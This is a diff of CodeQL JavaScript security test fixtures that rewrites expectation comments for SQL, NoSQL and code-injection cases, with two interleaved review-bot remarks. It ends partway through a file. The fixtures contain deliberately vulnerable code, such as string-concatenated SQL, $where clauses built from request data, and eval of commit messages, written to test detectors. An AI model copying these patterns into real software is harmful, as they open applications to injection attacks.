@@ -25,18 +25,18 @@ const server = http.createServer((req, res) => { filter: `(|(name=${username})(username=${username}))`, }; - client.search("o=example", opts1, function (err, res) {}); // NOT OK + client.search("o=example", opts1, function (err, res) {}); // $ Alert client.search( "o=example", - { filter: `(|(name=${username})(username=${username}))` }, // NOT OK + { filter: `(|(name=${username})(username=${username}))` }, // $ Alert function (err, res) {} ); - // GOOD + client.search( "o=example", - { // OK + { filter: `(|(name=${sanitizeInput(username)})(username=${sanitizeInput( username )}))`, @@ -44,7 +44,7 @@ const server = http.createServer((req, res) => { function (err, res) {} ); - // GOOD (https://github.com/ldapjs/node-ldapjs/issues/181) + // OK - https://github.com/ldapjs/node-ldapjs/issues/181 let f = new OrFilter({ filters: [ new EqualityFilter({ @@ -63,9 +63,9 @@ const server = http.createServer((req, res) => { const parsedFilter = ldap.parseFilter( `(|(name=${username})(username=${username}))` ); - client.search("o=example", { filter: parsedFilter }, function (err, res) {}); // NOT OK + client.search("o=example", { filter: parsedFilter }, function (err, res) {}); // $ Alert - const dn = ldap.parseDN(`cn=${username}`, function (err, dn) {}); // NOT OK + const dn = ldap.parseDN(`cn=${username}`, function (err, dn) {}); // $ Alert }); server.listen(389, () => {}); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb-flow-to.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb-flow-to.js index 9b6d9b2fb88a..a1fd044b84aa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb-flow-to.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb-flow-to.js 
@@ -10,6 +10,5 @@ app.post("/documents/find", (req, res) => { const query = {}; query.title = req.body.title; - // NOT OK: query is tainted by user-provided object value - db.myDoc.find(query, (err, data) => {}); + db.myDoc.find(query, (err, data) => {}); // $ Alert - query is tainted by user-provided object value }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb.js index 0ebbb3d8a71a..31eea4ddef3a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/marsdb.js @@ -12,6 +12,5 @@ app.post("/documents/find", (req, res) => { const query = {}; query.title = req.body.title; - // NOT OK: query is tainted by user-provided object value - doc.find(query, (err, data) => {}); + doc.find(query, (err, data) => {}); // $ Alert - query is tainted by user-provided object value }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/minimongo.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/minimongo.js index c2fe712e848c..a04855a27957 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/minimongo.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/minimongo.js @@ -14,6 +14,5 @@ app.post("/documents/find", (req, res) => { const query = {}; query.title = req.body.title; - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb.js index fc786da87ab0..c557845f7525 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb.js 
@@ -14,22 +14,20 @@ app.post('/documents/find', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value - // OK: user-data is coerced to a string + // OK - user-data is coerced to a string doc.find({ title: '' + query.body.title }); - // OK: throws unless user-data is a string + // OK - throws unless user-data is a string doc.find({ title: query.body.title.substr(1) }); let title = req.body.title; if (typeof title === "string") { - // OK: input checked to be a string + // OK - input checked to be a string doc.find({ title: title }); - // NOT OK: input is parsed as JSON after string check - doc.find({ title: JSON.parse(title) }); + doc.find({ title: JSON.parse(title) }); // $ Alert - input is parsed as JSON after string check } }); }); @@ -39,7 +37,7 @@ app.get('/:id', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // OK: query is tainted, but only by string value + // OK - query is tainted, but only by string value doc.find(query); }); }); @@ -50,8 +48,7 @@ app.post('/documents/find', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value }); }); @@ -61,8 +58,7 @@ app.post('/documents/find', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, client) => { let doc = client.db("MASTER").collection('doc'); - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value }); }); 
@@ -73,16 +69,14 @@ app.post("/logs/count-by-tag", (req, res) => { client .db(process.env.DB_NAME) .collection("logs") - // NOT OK: query is tainted by user-provided object value - .count({ tags: tag }); + .count({ tags: tag }); // $ Alert - query is tainted by user-provided object value }); let importedDbo = require("./dbo.js"); importedDbo .db() .collection("logs") - // NOT OK: query is tainted by user-provided object value - .count({ tags: tag }); + .count({ tags: tag }); // $ Alert - query is tainted by user-provided object value }); @@ -94,7 +88,7 @@ function useParams(params) { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // OK: query is tainted, but only by string value + // OK - query is tainted, but only by string value doc.find(query); }); } @@ -108,7 +102,6 @@ function useQuery(queries) { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // NOT OK: query is tainted by user-provided object value - doc.find(query); + doc.find(query); // $ Alert - query is tainted by user-provided object value }); } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb_bodySafe.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb_bodySafe.js index 61a87bfaa5ad..1aeb6f50c04a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb_bodySafe.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongodb_bodySafe.js @@ -14,7 +14,7 @@ app.post('/documents/find', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // OK: req.body is safe + // OK - req.body is safe doc.find(query); }); }); 
@@ -25,7 +25,6 @@ app.post('/documents/find', (req, res) => { MongoClient.connect('mongodb://localhost:27017/test', (err, db) => { let doc = db.collection('doc'); - // NOT OK: regardless of body parser, query value is still tainted - doc.find(query); + doc.find(query); // $ Alert - regardless of body parser, query value is still tainted }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongoose.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongoose.js index 3092a60b2cd2..d379534cd9bd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongoose.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongoose.js 
@@ -20,83 +20,69 @@ app.post('/documents/find', (req, res) => { const query = {}; query.title = req.body.title; - // NOT OK: query is tainted by user-provided object value - Document.aggregate([query]); + Document.aggregate([query]); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.count(query); + Document.count(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.deleteMany(query); + Document.deleteMany(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.deleteOne(query); + Document.deleteOne(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.distinct('type', query); + Document.distinct('type', query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.find(query); + Document.find(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.findOne(query); + Document.findOne(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.findOneAndDelete(query); + Document.findOneAndDelete(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.findOneAndRemove(query); + Document.findOneAndRemove(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.findOneAndUpdate(query); + Document.findOneAndUpdate(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - 
Document.replaceOne(query); + Document.replaceOne(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.update(query); + Document.update(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.updateMany(query); + Document.updateMany(query); // $ Alert - query is tainted by user-provided object value - // NOT OK: query is tainted by user-provided object value - Document.updateOne(query).then(X); + Document.updateOne(query).then(X); // $ Alert - query is tainted by user-provided object value - Document.findByIdAndUpdate(X, query, function(){}); // NOT OK + Document.findByIdAndUpdate(X, query, function(){}); // $ Alert - new Mongoose.Query(X, Y, query) // NOT OK - .and(query, function(){}) // NOT OK + new Mongoose.Query(X, Y, query) // $ Alert + .and(query, function(){}) // $ Alert ; - Document.where(query) // NOT OK - `.where()` on a Model. - .where(query) // NOT OK - `.where()` on a Query. - .and(query) // NOT OK - .or(query) // NOT OK - .distinct(X, query) // NOT OK - .comment(query) // OK - .count(query) // NOT OK + Document.where(query) // $ Alert - `.where()` on a Model. + .where(query) // $ Alert - `.where()` on a Query. 
+ .and(query) // $ Alert + .or(query) // $ Alert + .distinct(X, query) // $ Alert + .comment(query) + .count(query) // $ Alert .exec() ; - Mongoose.createConnection(X).count(query); // OK (invalid program) - Mongoose.createConnection(X).model(Y).count(query); // NOT OK - Mongoose.createConnection(X).models[Y].count(query); // NOT OK - - Document.findOne(X, (err, res) => res.count(query)); // NOT OK - Document.findOne(X, (err, res) => err.count(query)); // OK - Document.findOne(X).exec((err, res) => res.count(query)); // NOT OK - Document.findOne(X).exec((err, res) => err.count(query)); // OK - Document.findOne(X).then((res) => res.count(query)); // NOT OK - Document.findOne(X).then(Y, (err) => err.count(query)); // OK - - Document.find(X, (err, res) => res[i].count(query)); // NOT OK - Document.find(X, (err, res) => err.count(query)); // OK - Document.find(X).exec((err, res) => res[i].count(query)); // NOT OK - Document.find(X).exec((err, res) => err.count(query)); // OK - Document.find(X).then((res) => res[i].count(query)); // NOT OK - Document.find(X).then(Y, (err) => err.count(query)); // OK - - Document.count(X, (err, res) => res.count(query)); // OK (res is a number) + Mongoose.createConnection(X).count(query); // OK - invalid program + Mongoose.createConnection(X).model(Y).count(query); // $ Alert + Mongoose.createConnection(X).models[Y].count(query); // $ Alert + + Document.findOne(X, (err, res) => res.count(query)); // $ Alert + Document.findOne(X, (err, res) => err.count(query)); + Document.findOne(X).exec((err, res) => res.count(query)); // $ Alert + Document.findOne(X).exec((err, res) => err.count(query)); + Document.findOne(X).then((res) => res.count(query)); // $ Alert + Document.findOne(X).then(Y, (err) => err.count(query)); + + Document.find(X, (err, res) => res[i].count(query)); // $ Alert + Document.find(X, (err, res) => err.count(query)); + Document.find(X).exec((err, res) => res[i].count(query)); // $ Alert + Document.find(X).exec((err, res) => 
err.count(query)); + Document.find(X).then((res) => res[i].count(query)); // $ Alert + Document.find(X).then(Y, (err) => err.count(query)); + + Document.count(X, (err, res) => res.count(query)); // OK - res is a number function innocent(X, Y, query) { // To detect if API-graphs were used incorrectly. return new Mongoose.Query("constant", "constant", "constant"); 
@@ -108,31 +94,31 @@ app.post('/documents/find', (req, res) => { } var C = getQueryConstructor(); - new C(X, Y, query); // NOT OK + new C(X, Y, query); // $ Alert - Document.findOneAndUpdate(X, query, function () { }); // NOT OK + Document.findOneAndUpdate(X, query, function () { }); // $ Alert let id = req.query.id, cond = req.query.cond; - Document.deleteMany(cond); // NOT OK - Document.deleteOne(cond); // NOT OK - Document.geoSearch(cond); // NOT OK - Document.remove(cond); // NOT OK - Document.replaceOne(cond, Y); // NOT OK - Document.find(cond); // NOT OK - Document.findOne(cond); // NOT OK - Document.findById(id); // NOT OK - Document.findOneAndDelete(cond); // NOT OK - Document.findOneAndRemove(cond); // NOT OK - Document.findOneAndUpdate(cond, Y); // NOT OK - Document.update(cond, Y); // NOT OK - Document.updateMany(cond, Y); // NOT OK - Document.updateOne(cond, Y); // NOT OK - Document.find({ _id: id }); // NOT OK - Document.find({ _id: { $eq: id } }); // OK + Document.deleteMany(cond); // $ Alert + Document.deleteOne(cond); // $ Alert + Document.geoSearch(cond); // $ Alert + Document.remove(cond); // $ Alert + Document.replaceOne(cond, Y); // $ Alert + Document.find(cond); // $ Alert + Document.findOne(cond); // $ Alert + Document.findById(id); // $ Alert + Document.findOneAndDelete(cond); // $ Alert + Document.findOneAndRemove(cond); // $ Alert + Document.findOneAndUpdate(cond, Y); // $ Alert + Document.update(cond, Y); // $ Alert + Document.updateMany(cond, Y); // $ Alert + Document.updateOne(cond, Y); // $ Alert + Document.find({ _id: id }); // $ Alert + Document.find({ _id: { $eq: id } }); if (Mongoose.Types.ObjectId.isValid(query)) { Document.findByIdAndUpdate(query, X, function(){}); // OK - is sanitized } else { - Document.findByIdAndUpdate(query, X, function(){}); // NOT OK + Document.findByIdAndUpdate(query, X, function(){}); // $ Alert } }); 
diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseJsonParse.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseJsonParse.js
index a340bf2d968b..ea469f73ea3b 100644
--- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseJsonParse.js
+++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseJsonParse.js
@@ -19,7 +19,6 @@ app.get('/documents/find', (req, res) => {
 const query = {};
 query.title = JSON.parse(req.query.data).title;
- // NOT OK: query is tainted by user-provided object value
- Document.find(query);
+ Document.find(query); // $ Alert - query is tainted by user-provided object value
 });
diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseModelClient.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseModelClient.js
index f26ab52e7078..24aa90a9f735 100644
--- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseModelClient.js
+++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mongooseModelClient.js
@@ -8,7 +8,7 @@ app.use(bodyParser.json());
 app.post('/find', (req, res) => {
 let v = JSON.parse(req.body.x);
- MyModel.find({ id: v }); // NOT OK
- MyModel.find({ id: req.body.id }); // NOT OK
- MyModel.find({ id: `${req.body.id}` }); // OK
+ MyModel.find({ id: v }); // $ Alert
+ MyModel.find({ id: req.body.id }); // $ Alert
+ MyModel.find({ id: `${req.body.id}` });
 });
diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mysql.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mysql.js
index de328fb49fae..29c21a4f3b49 100644
--- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/mysql.js
+++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/mysql.js
@@ -6,17 +6,17 @@ app.get("search", function handler(req, res) {
 let temp = req.params.value;
 pool.getConnection(function(err, connection) {
 connection.query({
- sql: 'SELECT * FROM `books` WHERE `author` = ?', // OK
+ sql: 'SELECT * FROM `books` WHERE `author` = ?',
 values: [temp]
 }, function(error, results, fields) {});
 });
 pool.getConnection(function(err, connection) {
 connection.query({
- sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // NOT OK
+ sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // $ Alert
 }, function(error, results, fields) {});
 });
 pool.getConnection(function(err, connection) {
- connection.query('SELECT * FROM `books` WHERE `author` = ' + temp, // NOT OK
+ connection.query('SELECT * FROM `books` WHERE `author` = ' + temp, // $ Alert
 function(error, results, fields) {});
 });
 });
diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise-types.ts b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise-types.ts
index eaf46ad8cf85..03ad4e789653 100644
--- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise-types.ts
+++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise-types.ts
@@ -5,7 +5,7 @@ export class Foo {
 onRequest(req, res) {
 let taint = req.params.x;
- this.db.one(taint); // NOT OK
+ this.db.one(taint); // $ Alert
 res.end();
 }
 }
diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js
index d3f190dd1980..9ed6877e8663 100644
--- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js
+++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/pg-promise.js
@@ -6,61 +6,61 @@ require('express')().get('/foo', (req, res) => { var query = "SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='" + req.params.category + "' ORDER BY PRICE"; - db.any(query); // NOT OK - db.many(query); // NOT OK - db.manyOrNone(query); // NOT OK - db.map(query); // NOT OK - db.multi(query); // NOT OK - db.multiResult(query); // NOT OK - db.none(query); // NOT OK - db.one(query); // NOT OK - db.oneOrNone(query); // NOT OK - db.query(query); // NOT OK - db.result(query); // NOT OK + db.any(query); // $ Alert + db.many(query); // $ Alert + db.manyOrNone(query); // $ Alert + db.map(query); // $ Alert + db.multi(query); // $ Alert + db.multiResult(query); // $ Alert + db.none(query); // $ Alert + db.one(query); // $ Alert + db.oneOrNone(query); // $ Alert + db.query(query); // $ Alert + db.result(query); // $ Alert db.one({ - text: query // NOT OK + text: query // $ Alert }); db.one({ - text: 'SELECT * FROM news where id = $1', // OK - values: req.params.id, // OK + text: 'SELECT * FROM news where id = $1', + values: req.params.id, }); db.one({ text: 'SELECT * FROM news where id = $1:raw', - values: req.params.id, // NOT OK - interpreted as raw parameter + values: req.params.id, // $ Alert - interpreted as raw parameter }); db.one({ text: 'SELECT * FROM news where id = $1^', - values: req.params.id, // NOT OK + values: req.params.id, // $ Alert }); db.one({ text: 'SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3', values: [ - req.params.id, // NOT OK - req.params.name, // NOT OK + req.params.id, // $ Alert + req.params.name, // $ Alert req.params.foo, // OK - not using raw interpolation ] }); db.one({ text: 'SELECT * FROM news where id = ${id}:raw AND name = ${name}', values: { - id: req.params.id, // NOT OK + id: req.params.id, // $ Alert name: req.params.name, // OK - not using raw interpolation } }); db.one({ text: "SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE \"%${title}:value%\"", 
values: { - id: req.params.id, // NOT OK + id: req.params.id, // $ Alert name: req.params.name, // OK - :value cannot break out of single quotes - title: req.params.title, // NOT OK - enclosed by wrong type of quote + title: req.params.title, // $ Alert - enclosed by wrong type of quote } }); db.task(t => { - return t.one(query); // NOT OK + return t.one(query); // $ Alert }); db.taskIf( - { cnd: t => t.one(query) }, // NOT OK - t => t.one(query) // NOT OK + { cnd: t => t.one(query) }, // $ Alert + t => t.one(query) // $ Alert ); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/redis.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/redis.js index 44a628a3c9e8..f5ca83ef1bd3 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/redis.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/redis.js 
@@ -7,47 +7,47 @@ const app = Express(); app.use(require('body-parser').json()); app.post('/documents/find', (req, res) => { - client.set(req.body.key, "value"); // NOT OK + client.set(req.body.key, "value"); // $ Alert var key = req.body.key; if (typeof key === "string") { - client.set(key, "value"); // OK + client.set(key, "value"); client.set(["key", "value"]); } - client.set(key, "value"); // NOT OK - client.hmset("key", "field", "value", key, "value2"); // NOT OK + client.set(key, "value"); // $ Alert + client.hmset("key", "field", "value", key, "value2"); // $ Alert // chain commands client .multi() .set("constant", "value") - .set(key, "value") // NOT OK - .get(key) // OK + .set(key, "value") // $ Alert + .get(key) .exec(function (err, replies) { }); client.duplicate((err, newClient) => { - newClient.set(key, "value"); // NOT OK + newClient.set(key, "value"); // $ Alert }); - client.duplicate().set(key, "value"); // NOT OK + client.duplicate().set(key, "value"); // $ Alert }); import { promisify } from 'util'; app.post('/documents/find', (req, res) => { const key = req.body.key; - client.set(key, "value"); // NOT OK + client.set(key, "value"); // $ Alert const setAsync = promisify(client.set).bind(client); - const foo1 = setAsync(key, "value"); // NOT OK + const foo1 = setAsync(key, "value"); // $ Alert client.setAsync = promisify(client.set); - const foo2 = client.setAsync(key, "value"); // NOT OK + const foo2 = client.setAsync(key, "value"); // $ Alert client.unrelated = promisify(() => {}); - const foo3 = client.unrelated(key, "value"); // OK + const foo3 = client.unrelated(key, "value"); const unrelated = promisify(client.foobar).bind(client); - const foo4 = unrelated(key, "value"); // OK + const foo4 = unrelated(key, "value"); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst2.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst2.js index b28ddabc9ca6..c68c7d295ca7 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst2.js
+++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst2.js
@@ -3,8 +3,7 @@ const sql = require('mssql');
 var app = express();
 app.get('/post/:id', async function(req, res) {
- // OK
+
 sql.query`select * from mytable where id = ${req.params.id}`;
- // NOT OK
- new sql.Request().query("select * from mytable where id = '" + req.params.id + "'");
+ new sql.Request().query("select * from mytable where id = '" + req.params.id + "'"); // $ Alert
 });
diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst3.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst3.js
index 3f9aa21355d1..99c6869a5110 100644
--- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst3.js
+++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/tst3.js
@@ -6,11 +6,11 @@ const pool = new pg.Pool(config);
 function handler(req, res) {
 var query1 = "SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='" + req.params.category + "' ORDER BY PRICE";
- pool.query(query1, [], function(err, results) { // BAD: the category might have SQL special characters in it
+ pool.query(query1, [], function(err, results) { // $ Alert - the category might have SQL special characters in it
 // process results
 });
- // GOOD: use parameters
+ // OK - use parameters
 var query2 = "SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=$1" + " ORDER BY PRICE";
 pool.query(query2, [req.params.category], function(err, results) {
diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/NoSQLCodeInjection.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/NoSQLCodeInjection.js
index 6facf5ec75a5..0aeb77af5a20 100644
--- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/NoSQLCodeInjection.js
+++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/NoSQLCodeInjection.js
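Review bot: In the tst2.js hunk, deleting the `// OK` line above the `sql.query` tagged template leaves an empty added line as the first statement of the `app.get` handler body, which is stray whitespace rather than a replacement; drop that blank `+` line so the body starts directly at `sql.query\`select * from mytable where id = ${req.params.id}\`;`. The rest of the hunk, moving the expectation onto the `new sql.Request().query(...)` line as `// $ Alert`, reads fine.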
@@ -14,12 +14,12 @@ app.post("/documents/find", (req, res) => {
 MongoClient.connect("mongodb://localhost:27017/test", (err, db) => {
 let doc = db.collection("doc");
- doc.find(query); // NOT OK, but that is flagged by js/sql-injection [INCONSISTENCY]
- doc.find({ $where: req.body.query }); // NOT OK
- doc.find({ $where: "name = " + req.body.name }); // NOT OK
+ doc.find(query); // $ MISSING: Alert - that is flagged by js/sql-injection
+ doc.find({ $where: req.body.query }); // $ Alert[js/code-injection]
+ doc.find({ $where: "name = " + req.body.name }); // $ Alert[js/code-injection]
 function mkWhereObj() {
- return { $where: "name = " + req.body.name }; // NOT OK
+ return { $where: "name = " + req.body.name }; // $ Alert[js/code-injection]
 }
 doc.find(mkWhereObj()); // the alert location is in mkWhereObj.
diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/actions.js
index df5cd88971a3..62158678073c 100644
--- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/actions.js
+++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/actions.js
@@ -1,5 +1,5 @@
 const github = require('@actions/github');
 function test() {
- eval(github.context.payload.commits[1].message); // NOT OK
+ eval(github.context.payload.commits[1].message); // $ Alert[js/code-injection]
 }
diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/angularjs.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/angularjs.js
index 658d71e4c879..fb28264b5cec 100644
--- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/angularjs.js
+++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/angularjs.js
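Review bot: The new `$ MISSING: Alert` marker on `doc.find(query)` in NoSQLCodeInjection.js records the line as a known false negative, whereas the comment it replaces said the case is deliberately left to js/sql-injection; if `MISSING` in this expectation library means "should be reported but currently is not", the marker misstates the intent and will read as a bug to whoever next touches the query. If the split between the two queries is by design, a plain comment such as `doc.find(query); // OK - reported by js/sql-injection instead` records that without promising a future result; if it really is a gap in js/code-injection, tagging the marker with the query id like the neighbouring `$ Alert[js/code-injection]` lines would at least say which query is expected to close it. The enclosing `app.post` handler starts before this hunk.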
@@ -1,66 +1,66 @@ angular.module('myModule', []) .controller('MyController', function($scope) { - $scope.$on(location.search); // OK + $scope.$on(location.search); }) .controller('MyController', function($scope) { - $scope.$apply('hello'); // OK + $scope.$apply('hello'); }) .controller('MyController', function($scope) { var scope = $scope; - scope.$apply(location.search); // BAD + scope.$apply(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$apply(location.search); // BAD + $scope.$apply(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$applyAsync(location.search); // BAD + $scope.$applyAsync(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$eval(location.search); // BAD + $scope.$eval(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$evalAsync(location.search); // BAD + $scope.$evalAsync(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$watch(location.search); // BAD + $scope.$watch(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$watchCollection(location.search); // BAD + $scope.$watchCollection(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($scope) { - $scope.$watchGroup(location.search); // BAD + $scope.$watchGroup(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($compile) { - $compile(location.search); // BAD + $compile(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($compile) { - $compile('hello'); // OK + $compile('hello'); }) .controller('MyController', function($compile) { - $compile(location.search); // BAD + $compile(location.search); // $ Alert[js/code-injection] }) 
.controller('MyController', function($compile) { var compile = $compile; - compile(location.search); // BAD + compile(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($parse) { - $parse(location.search); // BAD + $parse(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($interpolate) { - $interpolate(location.search); // BAD + $interpolate(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($filter) { - $filter('orderBy')([], location.search); // BAD + $filter('orderBy')([], location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($filter) { - $filter('orderBy')([], 'hello'); // OK + $filter('orderBy')([], 'hello'); }) .controller('MyController', function($filter) { - $filter('random')([], location.search); // OK + $filter('random')([], location.search); }) .controller('MyController', function($someService) { - $someService('orderBy')([], location.search); // OK + $someService('orderBy')([], location.search); }) .controller('MyController', function($someService) { - $someService(location.search); // OK + $someService(location.search); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/bad-code-sanitization.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/bad-code-sanitization.js index f330b1513546..a49288de66ee 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/bad-code-sanitization.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/bad-code-sanitization.js 
@@ -5,18 +5,18 @@ function safeProp(key) { function test1() { const statements = []; statements.push(`${name}${safeProp(key)}=${stringify(thing[key])}`); - return `(function(){${statements.join(';')}})` // NOT OK + return `(function(){${statements.join(';')}})` // $ Alert[js/bad-code-sanitization] } import htmlescape from 'htmlescape' function test2(props) { const pathname = props.data.pathname; - return `function(){return new Error('${htmlescape(pathname)}')}`; // NOT OK + return `function(){return new Error('${htmlescape(pathname)}')}`; // $ Alert[js/bad-code-sanitization] } function test3(input) { - return `(function(){${JSON.stringify(input)}))` // NOT OK + return `(function(){${JSON.stringify(input)}))` // $ Alert[js/bad-code-sanitization] } function evenSaferProp(key) { @@ -24,24 +24,24 @@ function evenSaferProp(key) { } function test4(input) { - return `(function(){${evenSaferProp(input)}))` // OK + return `(function(){${evenSaferProp(input)}))` } function test4(input) { - var foo = `(function(){${JSON.stringify(input)}))` // NOT OK - we can type-track to a code-injection sink, the source is not remote flow. + var foo = `(function(){${JSON.stringify(input)}))` // $ Alert[js/bad-code-sanitization] - we can type-track to a code-injection sink, the source is not remote flow. setTimeout(foo); } function test5(input) { - console.log('methodName() => ' + JSON.stringify(input)); // OK + console.log('methodName() => ' + JSON.stringify(input)); } function test6(input) { - return `(() => {${JSON.stringify(input)})` // NOT OK + return `(() => {${JSON.stringify(input)})` // $ Alert[js/bad-code-sanitization] } function test7(input) { - return `() => {${JSON.stringify(input)}` // NOT OK + return `() => {${JSON.stringify(input)}` // $ Alert[js/bad-code-sanitization] } var 